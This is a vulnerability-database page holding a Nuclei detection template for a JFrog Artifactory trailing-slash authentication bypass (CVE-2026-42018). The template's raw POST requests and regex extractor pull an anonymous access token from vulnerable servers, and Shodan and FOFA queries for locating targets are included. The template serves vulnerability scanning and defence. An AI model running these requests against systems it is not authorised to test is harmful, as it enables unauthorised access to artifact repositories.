Lucene search
+L

JFrog Artifactory - Anonymous Token Disclosure via Trailing Slash Auth Bypass

🗓️ 18 Sep 2026 04:50:59Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 2 Views

Unauthenticated token disclosure in JFrog Artifactory via trailing slash on /access/api/v1/aws/token.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2026-65615
13 Sep 202608:25
githubexploit
attackerkb
ATTACKERKB
CVE-2026-4201
16 Mar 202600:32
attackerkb
circl
Circl
CVE-2026-4201
16 Mar 202601:30
circl
circl
Circl
CVE-2026-42018
18 Aug 202606:52
circl
circl
Circl
CVE-2026-65615
13 Sep 202614:00
circl
cisa_kev
CISA KEV Catalog
JFrog Artifactory Improper Authentication Vulnerability
11 Sep 202600:00
cisa_kev
cnnvd
CNNVD
glowxq-oj 代码问题漏洞
16 Mar 202600:00
cnnvd
cve
CVE
CVE-2026-4201
16 Mar 202600:32
cve
cve
CVE
CVE-2026-42018
12 Aug 202617:43
cve
cve
CVE
CVE-2026-65615
13 Sep 202614:00
cve
Rows per page
id: CVE-2026-42018

info:
  name: JFrog Artifactory - Anonymous Token Disclosure via Trailing Slash Auth Bypass
  author: theamanrawat
  severity: high
  description: |
    JFrog Artifactory contains an information disclosure caused by returning an internal anonymous-user token to unauthenticated callers when anonymous access is disabled, letting unauthenticated attackers access sensitive resources. The exploit requires anonymous access to be disabled.
  impact: |
    Unauthenticated attackers can access sensitive resources by obtaining internal tokens, potentially leading to information disclosure.
  remediation: |
    Update to the latest version where this issue is fixed.
  reference:
    - https://docs.jfrog.com/releases/docs/jfrog-security-advisories
    - https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201
    - https://github.com/BL0odz/JFrog_CVE-2026-65615-ByGLM
    - https://edrabb.fr/posts/full-chain-preauth-rce-jfrog-artifactory/
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-42018
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-42018
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"jfrog"
    fofa-query: title="jfrog"
  tags: cve,cve2026,jfrog,artifactory,auth-bypass,disclosure,kev,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /access/api/v1/aws/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 401'
        internal: true

  - raw:
      - |
        POST /access/api/v1/aws/token/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "access_token") && contains(body, "anonymous")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        name: anonymous-jwt-token
        part: body
        regex:
          - 'eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+'
# digest: 490a004630440220510adcff1de292f9ddae9ab3c2df3b23e5f5029b9d1e89bde51e50314497c98a02205eb0333ae72f29c69b8ab3aeceafd2785f67a5f3e317a413b0b2e938b22f9c6a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Sep 2026 04:50Current
CVSS 46.9
CVSS 3.17.5
CVSS 27.5
CVSS 37.3
EPSS0.0092
SSVC
2